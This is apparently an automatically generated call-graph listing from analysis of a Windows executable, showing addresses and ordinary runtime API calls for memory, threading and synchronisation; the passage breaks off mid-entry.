7ff7e357de30 17088->17117 17123 7ff7e3577b20 17089->17123 17093 7ff7e35787bd 17090->17093 17094 7ff7e35787d2 17090->17094 17092->17090 17096 7ff7e35782d0 2 API calls 17093->17096 17097 7ff7e35782d0 2 API calls 17094->17097 17099 7ff7e35787c9 17096->17099 17097->17099 17101 7ff7e3578785 17099->17101 17102 7ff7e357de30 4 API calls 17099->17102 17103 7ff7e3578809 17101->17103 17136 7ff7e3577470 17101->17136 17102->17101 17103->17077 17106 7ff7e3573986 17105->17106 17107 7ff7e357398a RaiseFailFastException 17106->17107 17108 7ff7e3573997 17106->17108 17107->17108 17108->17080 17110 7ff7e3578871 17109->17110 17190 7ff7e3577ec0 17110->17190 17112 7ff7e3578880 17113 7ff7e35788a1 17112->17113 17114 7ff7e357de30 4 API calls 17112->17114 17115 7ff7e35788b2 17113->17115 17116 7ff7e3577470 2 API calls 17113->17116 17114->17113 17115->17077 17116->17115 17118 7ff7e357dedc 17117->17118 17119 7ff7e357de6b 17117->17119 17118->17089 17119->17118 17122 7ff7e357dea4 17119->17122 17142 7ff7e357db50 17119->17142 17122->17118 17150 7ff7e357def0 17122->17150 17125 7ff7e3577b3d _swprintf_c_l 17123->17125 17124 7ff7e3577d10 17131 7ff7e35782d0 17124->17131 17125->17124 17126 7ff7e3577cef 17125->17126 17127 7ff7e3577ce7 17125->17127 17128 7ff7e3577cd8 RaiseFailFastException 17125->17128 17126->17124 17130 7ff7e357de30 4 API calls 17126->17130 17184 7ff7e3578540 17127->17184 17128->17126 17130->17124 17132 7ff7e3578337 17131->17132 17133 7ff7e35782e2 17131->17133 17132->17101 17133->17132 17134 7ff7e3577470 2 API calls 17133->17134 17135 7ff7e3578312 17134->17135 17135->17101 17137 7ff7e3577490 17136->17137 17138 7ff7e3577488 17136->17138 17137->17103 17138->17137 17139 7ff7e35774f9 RaiseFailFastException 17138->17139 17140 7ff7e3577506 17138->17140 17139->17140 17140->17137 17141 7ff7e3577521 RaiseFailFastException 17140->17141 17141->17137 17146 7ff7e357db74 17142->17146 17145 7ff7e35d8e70 _swprintf_c_l 3 API calls 17147 7ff7e357dc08 17145->17147 17146->17147 17154 7ff7e35d8e70 17146->17154 17149 7ff7e357dc95 ISource 17147->17149 17157 7ff7e357acb0 GetCurrentThreadId 17147->17157 17149->17122 17151 7ff7e357df45 17150->17151 17153 7ff7e357df4c 17150->17153 17180 7ff7e357d980 17151->17180 17153->17118 17158 7ff7e35d8d70 17154->17158 17157->17149 17159 7ff7e35d8d8a malloc 17158->17159 17160 7ff7e357dbdd 17159->17160 17161 7ff7e35d8d7b 17159->17161 17160->17145 17160->17149 17161->17159 17162 7ff7e35d8d9a 17161->17162 17163 7ff7e35d8da5 17162->17163 17167 7ff7e35d97ac 17162->17167 17171 7ff7e35d97cc 17163->17171 17168 7ff7e35d97ba std::bad_alloc::bad_alloc 17167->17168 17175 7ff7e35da65c 17168->17175 17170 7ff7e35d97cb 17172 7ff7e35d97da std::bad_alloc::bad_alloc 17171->17172 17173 7ff7e35da65c Concurrency::cancel_current_task 2 API calls 17172->17173 17174 7ff7e35d8dab 17173->17174 17176 7ff7e35da67b 17175->17176 17177 7ff7e35da6a4 RtlPcToFileHeader 17176->17177 17178 7ff7e35da6c6 RaiseException 17176->17178 17179 7ff7e35da6bc 17177->17179 17178->17170 17179->17178 17182 7ff7e357d9aa _swprintf_c_l 17180->17182 17181 7ff7e357d9d1 17181->17153 17182->17181 17183 7ff7e35d8e70 _swprintf_c_l 3 API calls 17182->17183 17183->17181 17185 7ff7e3578554 17184->17185 17186 7ff7e35786be RaiseFailFastException 17185->17186 17187 7ff7e3578623 RaiseFailFastException 17185->17187 17188 7ff7e3578639 RaiseFailFastException 17185->17188 17189 7ff7e35786d0 17185->17189 17186->17185 17187->17185 17188->17185 17189->17126 17198 7ff7e3577ef0 17190->17198 17191 7ff7e3577f43 RaiseFailFastException 17191->17198 17192 7ff7e35781de 17193 7ff7e3577b20 8 API calls 17192->17193 17199 7ff7e35781e4 17192->17199 17193->17199 17194 7ff7e35782b2 17194->17112 17195 7ff7e357820e RaiseFailFastException 17195->17199 17196 7ff7e3578231 17197 7ff7e3578540 3 API calls 17196->17197 17197->17199 17198->17191 17198->17192 17198->17195 17198->17196 17198->17199 17200 7ff7e35780a2 RaiseFailFastException 17198->17200 17202 7ff7e3577470 2 API calls 17198->17202 17205 7ff7e3578198 RaiseFailFastException 17198->17205 17206 7ff7e35781ae RaiseFailFastException 17198->17206 17207 7ff7e357de30 4 API calls 17198->17207 17208 7ff7e3577710 17198->17208 17199->17194 17201 7ff7e3577470 2 API calls 17199->17201 17200->17198 17203 7ff7e3578287 17201->17203 17202->17198 17203->17112 17205->17198 17206->17198 17207->17198 17209 7ff7e357773d 17208->17209 17210 7ff7e3577767 17208->17210 17211 7ff7e357de30 4 API calls 17209->17211 17212 7ff7e35778f6 17210->17212 17216 7ff7e3577794 17210->17216 17211->17210 17213 7ff7e35778fc RaiseFailFastException 17212->17213 17214 7ff7e3577909 17212->17214 17213->17214 17215 7ff7e3577470 2 API calls 17214->17215 17218 7ff7e35778e1 17215->17218 17217 7ff7e3577470 2 API calls 17216->17217 17217->17218 17218->17198 18050 7ff7e358af28 18051 7ff7e358af80 18050->18051 18052 7ff7e358af2d 18050->18052 18054 7ff7e359d760 11 API calls 18051->18054 18060 7ff7e35ae700 18052->18060 18054->18052 18055 7ff7e358b02a 18056 7ff7e358b055 18055->18056 18068 7ff7e35a1650 18055->18068 18072 7ff7e3592490 18056->18072 18059 7ff7e358b0c0 18061 7ff7e35ae719 18060->18061 18065 7ff7e35ae729 18060->18065 18061->18055 18062 7ff7e35ae85b SwitchToThread 18062->18065 18063 7ff7e35ae779 SwitchToThread 18063->18065 18064 7ff7e35ae867 18064->18055 18065->18062 18065->18063 18065->18064 18066 7ff7e35ae817 SwitchToThread 18065->18066 18067 7ff7e35ae82c SwitchToThread 18065->18067 18066->18065 18067->18065 18069 7ff7e35a166f 18068->18069 18070 7ff7e35a16da _swprintf_c_l 18068->18070 18069->18070 18077 7ff7e35829e0 VirtualAlloc 18069->18077 18070->18056 18073 7ff7e35a1650 2 API calls 18072->18073 18075 7ff7e35924c5 _swprintf_c_l 18073->18075 18074 7ff7e35ae700 4 API calls 18076 7ff7e3592615 18074->18076 18075->18074 18076->18059 18076->18076 18078 7ff7e3582a2c 18077->18078 18079 7ff7e3582a1b 18077->18079 18078->18070 18079->18078 18080 7ff7e3582a20 VirtualUnlock 18079->18080 18080->18078 18081 7ff7e357a5b1 18082 7ff7e357a584 18081->18082 18083 7ff7e357a5c3 18081->18083 18088 7ff7e358725e 18083->18088 18096 7ff7e3587230 18083->18096 18100 7ff7e35873e1 18083->18100 18084 7ff7e357a5e4 18089 7ff7e358729b 18088->18089 18090 7ff7e35872c5 18088->18090 18092 7ff7e35872a4 DebugBreak 18089->18092 18094 7ff7e35872a9 18089->18094 18104 7ff7e358cd40 18090->18104 18092->18094 18093 7ff7e35872e8 18093->18094 18119 7ff7e3589c50 18093->18119 18094->18084 18097 7ff7e35872a9 18096->18097 18098 7ff7e35873a2 18096->18098 18097->18084 18098->18097 18099 7ff7e3589c50 3 API calls 18098->18099 18099->18097 18101 7ff7e35873c0 18100->18101 18101->18100 18102 7ff7e35872a9 18101->18102 18103 7ff7e3589c50 3 API calls 18101->18103 18102->18084 18103->18102 18108 7ff7e358cd6f 18104->18108 18106 7ff7e358cf7a 18107 7ff7e35a49a0 GetTickCount64 18106->18107 18106->18108 18116 7ff7e3593480 39 API calls 18106->18116 18157 7ff7e35b04d0 18106->18157 18171 7ff7e358d470 18106->18171 18107->18106 18108->18106 18110 7ff7e358ce29 SwitchToThread 18108->18110 18112 7ff7e358cf4b 18108->18112 18115 7ff7e35b0690 WaitForSingleObject 18108->18115 18117 7ff7e358ce55 SwitchToThread 18108->18117 18118 7ff7e358ce1d SwitchToThread 18108->18118 18126 7ff7e358d9f0 18108->18126 18146 7ff7e35826f0 18108->18146 18149 7ff7e3593480 18108->18149 18110->18108 18112->18093 18115->18108 18116->18106 18117->18108 18118->18108 18120 7ff7e3589cbf 18119->18120 18122 7ff7e3589c86 18119->18122 18121 7ff7e3589d95 ISource 18120->18121 18125 7ff7e3589d90 DebugBreak 18120->18125 18121->18094 18122->18120 18123 7ff7e3589c99 SwitchToThread 18122->18123 18124 7ff7e35826f0 SleepEx 18122->18124 18123->18122 18124->18122 18125->18121 18127 7ff7e358da2c 18126->18127 18128 7ff7e358dbe2 18126->18128 18129 7ff7e358dbe7 18127->18129 18130 7ff7e358da9d 18127->18130 18181 7ff7e35ae890 18128->18181 18129->18128 18188 7ff7e3586e90 18129->18188 18132 7ff7e358daac SwitchToThread 18130->18132 18136 7ff7e358daba 18132->18136 18134 7ff7e358db61 SwitchToThread 18134->18136 18136->18128 18136->18134 18140 7ff7e358db8d SwitchToThread 18136->18140 18141 7ff7e35826f0 SleepEx 18136->18141 18144 7ff7e358db55 SwitchToThread 18136->18144 18184 7ff7e35b0690 18136->18184 18140->18136 18141->18136 18144->18136 18147 7ff7e35826fd 18146->18147 18148 7ff7e35826f4 SleepEx 18146->18148 18147->18108 18148->18147 18150 7ff7e359365f 18149->18150 18151 7ff7e35934b0 18149->18151 18150->18108 18151->18150 18155 7ff7e35935b9 18151->18155 18202 7ff7e359c160 18151->18202 18155->18150 18217 7ff7e35826d0 ResetEvent 18155->18217 18158 7ff7e35b0679 18157->18158 18159 7ff7e35b04ed 18157->18159 18158->18106 18160 7ff7e3581e90 10 API calls 18159->18160 18161 7ff7e35b0514 18160->18161 18162 7ff7e35b0667 18161->18162 18163 7ff7e3586e90 WaitForSingleObject 18161->18163 18162->18106 18166 7ff7e35b054d 18163->18166 18164 7ff7e35b0650 18164->18106 18165 7ff7e35b05d9 SwitchToThread 18165->18166 18166->18164 18166->18165 18167 7ff7e35b0605 SwitchToThread 18166->18167 18168 7ff7e35826f0 SleepEx 18166->18168 18169 7ff7e35b0690 WaitForSingleObject 18166->18169 18170 7ff7e35b05cd SwitchToThread 18166->18170 18167->18166 18168->18166 18169->18166 18170->18166 18172 7ff7e358d4ac 18171->18172 18174 7ff7e358d61b 18171->18174 18173 7ff7e35826f0 SleepEx 18172->18173 18172->18174 18179 7ff7e358d4ef 18173->18179 18175 7ff7e358d59a SwitchToThread 18175->18179 18176 7ff7e358d5c6 SwitchToThread 18176->18179 18177 7ff7e35826f0 SleepEx 18177->18179 18178 7ff7e35b0690 WaitForSingleObject 18178->18179 18179->18174 18179->18175 18179->18176 18179->18177 18179->18178 18180 7ff7e358d58e SwitchToThread 18179->18180 18180->18179 18192 7ff7e358aa00 18181->18192 18183 7ff7e35ae8c8 18183->18128 18185 7ff7e35b06a6 18184->18185 18187 7ff7e35b06dd 18185->18187 18200 7ff7e3582a50 WaitForSingleObject 18185->18200 18187->18136 18189 7ff7e3586ea8 18188->18189 18201 7ff7e3582a50 WaitForSingleObject 18189->18201 18193 7ff7e358aa57 18192->18193 18194 7ff7e358ae0a 18193->18194 18195 7ff7e35ae700 4 API calls 18193->18195 18194->18183 18199 7ff7e358ab55 _swprintf_c_l 18195->18199 18196 7ff7e35a1650 2 API calls 18197 7ff7e358ad41 18196->18197 18197->18194 18198 7ff7e3592490 6 API calls 18197->18198 18198->18194 18199->18196 18199->18197 18204 7ff7e359c214 18202->18204 18205 7ff7e359c37a 18204->18205 18218 7ff7e3582690 QueryPerformanceCounter 18204->18218 18206 7ff7e358d020 24 API calls 18205->18206 18211 7ff7e359c51d 18205->18211 18207 7ff7e359c4e6 18206->18207 18208 7ff7e359c5a4 18207->18208 18209 7ff7e3593d20 7 API calls 18207->18209 18207->18211 18219 7ff7e35ab150 18208->18219 18212 7ff7e359c508 18209->18212 18213 7ff7e3581e90 10 API calls 18211->18213 18216 7ff7e359c598 18211->18216 18212->18208 18214 7ff7e359c510 18212->18214 18213->18216 18215 7ff7e35964a0 5 API calls 18214->18215 18215->18211 18216->18155 18218->18205 18220 7ff7e35ab16b 18219->18220 18221 7ff7e35ab1a3 EnterCriticalSection LeaveCriticalSection 18220->18221 18222 7ff7e35ab1c5 _swprintf_c_l 18220->18222 18221->18222 18222->18211 18223 7ff7e357fc50 18224 7ff7e357fc6a 18223->18224 18225 7ff7e357fc75 18223->18225 18226 7ff7e357fca2 VirtualAlloc 18225->18226 18231 7ff7e357fcf6 18225->18231 18227 7ff7e357fcdd 18226->18227 18226->18231 18228 7ff7e35d8e70 _swprintf_c_l 3 API calls 18227->18228 18229 7ff7e357fcee 18228->18229 18230 7ff7e357fd41 VirtualFree 18229->18230 18229->18231 18230->18231 17219 7ff7e3576740 17224 7ff7e3574a90 17219->17224 17221 7ff7e3576752 17230 7ff7e362c430 17221->17230 17225 7ff7e3574ab6 17224->17225 17226 7ff7e3574ad4 17225->17226 17237 7ff7e357aad0 FlsGetValue 17225->17237 17226->17221 17228 7ff7e3574acc 17229 7ff7e3575780 6 API calls 17228->17229 17229->17226 17240 7ff7e3576480 17230->17240 17232 7ff7e362c451 17256 7ff7e3614210 17232->17256 17235 7ff7e362c456 17259 7ff7e3576880 17235->17259 17264 7ff7e3576870 17235->17264 17238 7ff7e357aaea RaiseFailFastException 17237->17238 17239 7ff7e357aaf8 FlsSetValue 17237->17239 17238->17239 17246 7ff7e35764a5 17240->17246 17241 7ff7e357657f 17243 7ff7e3576586 17241->17243 17244 7ff7e357659f 17241->17244 17242 7ff7e35764b9 17242->17232 17268 7ff7e357b030 17243->17268 17248 7ff7e35765cf 17244->17248 17271 7ff7e3576210 GetLastError 17244->17271 17245 7ff7e3576566 17249 7ff7e3574a90 9 API calls 17245->17249 17246->17241 17246->17242 17246->17245 17251 7ff7e3576547 17246->17251 17252 7ff7e3576528 17246->17252 17248->17232 17249->17241 17250 7ff7e3576592 RaiseFailFastException 17250->17244 17251->17245 17255 7ff7e3576559 RaiseFailFastException 17251->17255 17254 7ff7e3576530 Sleep 17252->17254 17254->17251 17254->17254 17255->17245 17274 7ff7e36142c0 17256->17274 17258 7ff7e361421e 17258->17235 17262 7ff7e3576884 17259->17262 17260 7ff7e3576890 WaitForSingleObjectEx 17261 7ff7e35768c7 17260->17261 17260->17262 17261->17235 17262->17260 17263 7ff7e35768b9 17262->17263 17263->17235 17265 7ff7e357fad0 17264->17265 17266 7ff7e357fada 17265->17266 17267 7ff7e357fae1 SetEvent 17265->17267 17266->17235 17267->17235 17269 7ff7e357b044 17268->17269 17269->17269 17270 7ff7e357b04d GetStdHandle WriteFile 17269->17270 17270->17250 17272 7ff7e3576240 17271->17272 17273 7ff7e3576266 SetLastError 17272->17273 17276 7ff7e36142df 17274->17276 17275 7ff7e361432e 17275->17258 17276->17275 17277 7ff7e361430b CoInitializeEx 17276->17277 17278 7ff7e3614322 17277->17278 17278->17275 17279 7ff7e361437a 17278->17279 17287 7ff7e35722d0 17278->17287 17281 7ff7e35722d0 17 API calls 17279->17281 17283 7ff7e3614386 17281->17283 17282 7ff7e3614367 17285 7ff7e35725d0 17 API calls 17282->17285 17284 7ff7e35725d0 17 API calls 17283->17284 17286 7ff7e3614399 17284->17286 17285->17279 17288 7ff7e35722fb 17287->17288 17290 7ff7e3572302 17287->17290 17288->17282 17289 7ff7e3572359 17289->17282 17290->17289 17291 7ff7e35725d0 17 API calls 17290->17291 17292 7ff7e362c971 17291->17292 17293 7ff7e362cb00 17 API calls 17292->17293 17294 7ff7e362ca3d 17293->17294 17295 7ff7e35755c0 17325 7ff7e357ae30 FlsAlloc 17295->17325 17297 7ff7e357572e 17298 7ff7e35755cb 17298->17297 17338 7ff7e357acd0 GetModuleHandleExW 17298->17338 17300 7ff7e35755eb 17339 7ff7e3576f20 17300->17339 17302 7ff7e35755f3 17302->17297 17347 7ff7e357b560 17302->17347 17306 7ff7e3575610 17306->17297 17307 7ff7e3575638 RtlAddVectoredExceptionHandler 17306->17307 17308 7ff7e357564c 17307->17308 17309 7ff7e3575651 17307->17309 17311 7ff7e357d5c0 9 API calls 17308->17311 17312 7ff7e3575685 17308->17312 17384 7ff7e357d5c0 17309->17384 17311->17312 17313 7ff7e35756df 17312->17313 17361 7ff7e357dd30 17312->17361 17369 7ff7e3579d50 17313->17369 17316 7ff7e35756e4 17316->17297 17390 7ff7e3575270 17316->17390 17326 7ff7e357af7e 17325->17326 17327 7ff7e357ae50 17325->17327 17326->17298 17401 7ff7e3583720 17327->17401 17329 7ff7e357ae55 17330 7ff7e35824c0 10 API calls 17329->17330 17331 7ff7e357ae5a 17330->17331 17331->17326 17332 7ff7e357d5c0 9 API calls 17331->17332 17333 7ff7e357ae82 17332->17333 17334 7ff7e357aeaa GetCurrentProcess GetProcessAffinityMask 17333->17334 17335 7ff7e357aea1 17333->17335 17337 7ff7e357af18 17333->17337 17334->17335 17336 7ff7e357aef4 QueryInformationJobObject 17335->17336 17336->17337 17337->17298 17338->17300 17340 7ff7e35d8e70 _swprintf_c_l 3 API calls 17339->17340 17341 7ff7e3576f35 17340->17341 17342 7ff7e3576f74 17341->17342 17540 7ff7e357fbd0 17341->17540 17342->17302 17344 7ff7e3576f42 17344->17342 17345 7ff7e357b220 InitializeCriticalSectionEx 17344->17345 17346 7ff7e3576f6d 17345->17346 17346->17302 17348 7ff7e357b220 InitializeCriticalSectionEx 17347->17348 17349 7ff7e3575600 17348->17349 17349->17297 17350 7ff7e3576960 17349->17350 17351 7ff7e35d8e70 _swprintf_c_l 3 API calls 17350->17351 17352 7ff7e357697e 17351->17352 17353 7ff7e3576a1a 17352->17353 17543 7ff7e3574bc0 17352->17543 17353->17306 17355 7ff7e35769b0 17356 7ff7e35769fa 17355->17356 17550 7ff7e3574cb0 17355->17550 17356->17306 17358 7ff7e35769bd 17360 7ff7e35769cd ISource 17358->17360 17554 7ff7e3574a40 17358->17554 17360->17306 17362 7ff7e357dd5b 17361->17362 17368 7ff7e357de06 17361->17368 17363 7ff7e35d8e70 _swprintf_c_l 3 API calls 17362->17363 17364 7ff7e357dd7a 17363->17364 17365 7ff7e357b220 InitializeCriticalSectionEx 17364->17365 17366 7ff7e357dda5 17365->17366 17367 7ff7e357ddee GetSystemTimeAsFileTime 17366->17367 17367->17368 17368->17313 17370 7ff7e35d87ed 17369->17370 17371 7ff7e3579d89 EventRegister 17370->17371 17372 7ff7e3579e0c 17371->17372 17374 7ff7e3579e07 17371->17374 17373 7ff7e357d5c0 9 API calls 17372->17373 17373->17374 17559 7ff7e357a630 17374->17559 17377 7ff7e3579e84 17377->17316 17378 7ff7e3579e5b 17378->17377 17577 7ff7e35767c0 17378->17577 17380 7ff7e3579e64 17380->17377 17584 7ff7e357e7e0 17380->17584 17381 7ff7e3579e74 17381->17316 17389 7ff7e357d630 17384->17389 17385 7ff7e357d6cd 17386 7ff7e35d8e50 8 API calls 17385->17386 17388 7ff7e357d7ad 17386->17388 17387 7ff7e357d6b0 _wcsicmp 17387->17385 17387->17389 17388->17308 17389->17385 17389->17387 17394 7ff7e357529a 17390->17394 17398 7ff7e35753fb 17390->17398 17391 7ff7e3575586 17391->17297 17399 7ff7e357b220 17391->17399 17392 7ff7e357b030 2 API calls 17393 7ff7e357557a RaiseFailFastException 17392->17393 17393->17391 17394->17398 17834 7ff7e357afe0 LoadLibraryExW 17394->17834 17396 7ff7e3575376 17396->17398 17837 7ff7e357af90 LoadLibraryExW 17396->17837 17398->17391 17398->17392 17400 7ff7e35d8a63 InitializeCriticalSectionEx 17399->17400 17528 7ff7e35799a0 17401->17528 17404 7ff7e35799a0 9 API calls 17405 7ff7e358375e 17404->17405 17406 7ff7e35799a0 9 API calls 17405->17406 17407 7ff7e3583779 17406->17407 17408 7ff7e35799a0 9 API calls 17407->17408 17409 7ff7e3583794 17408->17409 17410 7ff7e35799a0 9 API calls 17409->17410 17411 7ff7e35837b4 17410->17411 17412 7ff7e35799a0 9 API calls 17411->17412 17413 7ff7e35837cf 17412->17413 17414 7ff7e35799a0 9 API calls 17413->17414 17415 7ff7e35837ef 17414->17415 17416 7ff7e35799a0 9 API calls 17415->17416 17417 7ff7e358380a 17416->17417 17418 7ff7e35799a0 9 API calls 17417->17418 17419 7ff7e3583825 17418->17419 17420 7ff7e35799a0 9 API calls 17419->17420 17421 7ff7e3583840 17420->17421 17422 7ff7e35799a0 9 API calls 17421->17422 17423 7ff7e3583860 17422->17423 17424 7ff7e35799a0 9 API calls 17423->17424 17425 7ff7e3583880 17424->17425 17534 7ff7e3579b60 17425->17534 17428 7ff7e3579b60 9 API calls 17429 7ff7e35838b0 17428->17429 17430 7ff7e3579b60 9 API calls 17429->17430 17431 7ff7e35838c5 17430->17431 17432 7ff7e3579b60 9 API calls 17431->17432 17433 7ff7e35838da 17432->17433 17434 7ff7e3579b60 9 API calls 17433->17434 17435 7ff7e35838ef 17434->17435 17436 7ff7e3579b60 9 API calls 17435->17436 17437 7ff7e3583909 17436->17437 17438 7ff7e3579b60 9 API calls 17437->17438 17439 7ff7e358391e 17438->17439 17440 7ff7e3579b60 9 API calls 17439->17440 17441 7ff7e3583933 17440->17441 17442 7ff7e3579b60 9 API calls 17441->17442 17443 7ff7e3583948 17442->17443 17444 7ff7e3579b60 9 API calls 17443->17444 17445 7ff7e358395d 17444->17445 17446 7ff7e3579b60 9 API calls 17445->17446 17447 7ff7e3583972 17446->17447 17448 7ff7e3579b60 9 API calls 17447->17448 17449 7ff7e3583987 17448->17449 17450 7ff7e3579b60 9 API calls 17449->17450 17451 7ff7e35839a1 17450->17451 17452 7ff7e3579b60 9 API calls 17451->17452 17453 7ff7e35839bb 17452->17453 17454 7ff7e3579b60 9 API calls 17453->17454 17455 7ff7e35839d0 17454->17455 17456 7ff7e3579b60 9 API calls 17455->17456 17457 7ff7e35839e5 17456->17457 17458 7ff7e3579b60 9 API calls 17457->17458 17459 7ff7e35839fa 17458->17459 17460 7ff7e3579b60 9 API calls 17459->17460 17461 7ff7e3583a0f 17460->17461 17462 7ff7e3579b60 9 API calls 17461->17462 17463 7ff7e3583a29 17462->17463 17464 7ff7e3579b60 9 API calls 17463->17464 17465 7ff7e3583a43 17464->17465 17466 7ff7e3579b60 9 API calls 17465->17466 17467 7ff7e3583a58 17466->17467 17468 7ff7e3579b60 9 API calls 17467->17468 17469 7ff7e3583a6d 17468->17469 17470 7ff7e3579b60 9 API calls 17469->17470 17471 7ff7e3583a82 17470->17471 17472 7ff7e3579b60 9 API calls 17471->17472 17473 7ff7e3583a97 17472->17473 17474 7ff7e3579b60 9 API calls 17473->17474 17475 7ff7e3583aac 17474->17475 17476 7ff7e3579b60 9 API calls 17475->17476 17477 7ff7e3583ac1 17476->17477 17478 7ff7e3579b60 9 API calls 17477->17478 17479 7ff7e3583ad6 17478->17479 17480 7ff7e3579b60 9 API calls 17479->17480 17481 7ff7e3583aeb 17480->17481 17482 7ff7e3579b60 9 API calls 17481->17482 17483 7ff7e3583b00 17482->17483 17484 7ff7e3579b60 9 API calls 17483->17484 17485 7ff7e3583b15 17484->17485 17486 7ff7e3579b60 9 API calls 17485->17486 17487 7ff7e3583b2a 17486->17487 17488 7ff7e3579b60 9 API calls 17487->17488 17489 7ff7e3583b3f 17488->17489 17490 7ff7e3579b60 9 API calls 17489->17490 17491 7ff7e3583b54 17490->17491 17492 7ff7e3579b60 9 API calls 17491->17492 17493 7ff7e3583b69 17492->17493 17494 7ff7e3579b60 9 API calls 17493->17494 17495 7ff7e3583b7e 17494->17495 17496 7ff7e3579b60 9 API calls 17495->17496 17497 7ff7e3583b93 17496->17497 17498 7ff7e3579b60 9 API calls 17497->17498 17499 7ff7e3583ba8 17498->17499 17500 7ff7e3579b60 9 API calls 17499->17500 17501 7ff7e3583bbd 17500->17501 17502 7ff7e3579b60 9 API calls 17501->17502 17503 7ff7e3583bd2 17502->17503 17504 7ff7e3579b60 9 API calls 17503->17504 17505 7ff7e3583be7 17504->17505 17506 7ff7e3579b60 9 API calls 17505->17506 17507 7ff7e3583bfc 17506->17507 17508 7ff7e3579b60 9 API calls 17507->17508 17509 7ff7e3583c11 17508->17509 17510 7ff7e3579b60 9 API calls 17509->17510 17511 7ff7e3583c26 17510->17511 17512 7ff7e3579b60 9 API calls 17511->17512 17513 7ff7e3583c40 17512->17513 17514 7ff7e3579b60 9 API calls 17513->17514 17515 7ff7e3583c5a 17514->17515 17516 7ff7e3579b60 9 API calls 17515->17516 17517 7ff7e3583c74 17516->17517 17518 7ff7e3579b60 9 API calls 17517->17518 17519 7ff7e3583c8e 17518->17519 17520 7ff7e3579b60 9 API calls 17519->17520 17521 7ff7e3583ca8 17520->17521 17522 7ff7e3579b60 9 API calls 17521->17522 17523 7ff7e3583cc2 17522->17523 17524 7ff7e3579b60 9 API calls 17523->17524 17525 7ff7e3583cd7 17524->17525 17526 7ff7e3579b60 9 API calls 17525->17526 17527 7ff7e3583cf1 17526->17527 17530 7ff7e35799d3 17528->17530 17529 7ff7e35799d7 17531 7ff7e35d8e50 8 API calls 17529->17531 17530->17529 17530->17530 17533 7ff7e357d5c0 9 API calls 17530->17533 17532 7ff7e3579b0e 17531->17532 17532->17404 17533->17529 17537 7ff7e3579b90 17534->17537 17535 7ff7e357d5c0 9 API calls 17536 7ff7e3579ca8 17535->17536 17538 7ff7e35d8e50 8 API calls 17536->17538 17537->17535 17537->17537 17539 7ff7e3579cc0 17538->17539 17539->17428 17541 7ff7e357b220 InitializeCriticalSectionEx 17540->17541 17542 7ff7e357fc1c 17541->17542 17542->17344 17544 7ff7e35d8e70 _swprintf_c_l 3 API calls 17543->17544 17545 7ff7e3574bde 17544->17545 17546 7ff7e357b220 InitializeCriticalSectionEx 17545->17546 17547 7ff7e3574c10 17545->17547 17546->17547 17548 7ff7e3574c68 ISource 17547->17548 17557 7ff7e357b200 17547->17557 17548->17355 17551 7ff7e3574cb5 17550->17551 17553 7ff7e3574cc6 ISource 17550->17553 17552 7ff7e357b200 DeleteCriticalSection 17551->17552 17552->17553 17553->17358 17555 7ff7e357b200 17554->17555 17555->17360 17556 7ff7e35d889b DeleteCriticalSection 17555->17556 17557->17548 17558 7ff7e35d889b DeleteCriticalSection 17557->17558 17594 7ff7e3581b70 17559->17594 17561 7ff7e3579e47 17561->17377 17562 7ff7e3588f50 17561->17562 17563 7ff7e357de30 4 API calls 17562->17563 17564 7ff7e3588f69 17563->17564 17605 7ff7e35826b0 QueryPerformanceFrequency 17564->17605 17566 7ff7e3588f6e 17568 7ff7e3588fe9 17566->17568 17606 7ff7e3582070 17566->17606 17576 7ff7e358925b ISource 17568->17576 17620 7ff7e359f450 17568->17620 17570 7ff7e358945c 17571 7ff7e35d8e70 _swprintf_c_l 3 API calls 17570->17571 17570->17576 17572 7ff7e3589592 17571->17572 17572->17576 17643 7ff7e3581cc0 17572->17643 17574 7ff7e35895bd 17648 7ff7e359dc30 17574->17648 17576->17378 17578 7ff7e35767d2 17577->17578 17579 7ff7e357680d 17578->17579 17811 7ff7e357fa80 CreateEventW 17578->17811 17579->17380 17581 7ff7e35767e4 17581->17579 17812 7ff7e357b130 CreateThread 17581->17812 17583 7ff7e3576803 17583->17380 17585 7ff7e357e7f7 17584->17585 17586 7ff7e357e7ff 17585->17586 17587 7ff7e35d8e70 _swprintf_c_l 3 API calls 17585->17587 17586->17381 17590 7ff7e357e831 17587->17590 17588 7ff7e357e968 ISource 17588->17381 17590->17588 17591 7ff7e357e8c5 ISource 17590->17591 17815 7ff7e3584160 17590->17815 17592 7ff7e357e902 ISource 17591->17592 17821 7ff7e35843f0 17591->17821 17592->17381 17599 7ff7e3584a30 17594->17599 17598 7ff7e3581baf 17598->17561 17600 7ff7e35d8e70 _swprintf_c_l 3 API calls 17599->17600 17601 7ff7e3581b98 17600->17601 17601->17598 17602 7ff7e3586580 17601->17602 17603 7ff7e35d8e70 _swprintf_c_l 3 API calls 17602->17603 17604 7ff7e3586595 17603->17604 17604->17598 17605->17566 17607 7ff7e3582093 17606->17607 17608 7ff7e35820a7 GetCurrentProcess IsProcessInJob 17607->17608 17615 7ff7e35821e4 17607->17615 17609 7ff7e35820fc 17608->17609 17610 7ff7e35821a3 17608->17610 17609->17610 17613 7ff7e3582106 QueryInformationJobObject 17609->17613 17614 7ff7e35821bb GlobalMemoryStatusEx 17610->17614 17610->17615 17611 7ff7e3582228 17617 7ff7e35d8e50 8 API calls 17611->17617 17612 7ff7e3582232 GlobalMemoryStatusEx 17612->17611 17613->17610 17616 7ff7e3582128 17613->17616 17614->17615 17615->17611 17615->17612 17616->17610 17619 7ff7e358216c GlobalMemoryStatusEx 17616->17619 17618 7ff7e3582274 17617->17618 17618->17568 17619->17610 17671 7ff7e3582700 VirtualAlloc 17620->17671 17622 7ff7e359f472 17623 7ff7e359f4d7 17622->17623 17747 7ff7e35824a0 InitializeCriticalSection 17622->17747 17625 7ff7e359f8cd 17623->17625 17674 7ff7e35b0220 17623->17674 17627 7ff7e359f501 _swprintf_c_l 17642 7ff7e359f743 17627->17642 17684 7ff7e359f150 17627->17684 17629 7ff7e359f6d8 17688 7ff7e359cc20 17629->17688 17633 7ff7e359f712 17633->17642 17695 7ff7e359f8f0 17633->17695 17636 7ff7e359f738 17748 7ff7e35827f0 VirtualFree 17636->17748 17638 7ff7e359f767 17638->17642 17709 7ff7e35b2eb0 17638->17709 17642->17570 17644 7ff7e35d8e70 _swprintf_c_l 3 API calls 17643->17644 17645 7ff7e3581ce6 17644->17645 17646 7ff7e3581cee CreateEventW 17645->17646 17647 7ff7e3581d10 ISource 17645->17647 17646->17647 17647->17574 17649 7ff7e359dcba _swprintf_c_l 17648->17649 17650 7ff7e3581cc0 4 API calls 17649->17650 17651 7ff7e359dcc8 17650->17651 17661 7ff7e359e527 17651->17661 17789 7ff7e3582690 QueryPerformanceCounter 17651->17789 17654 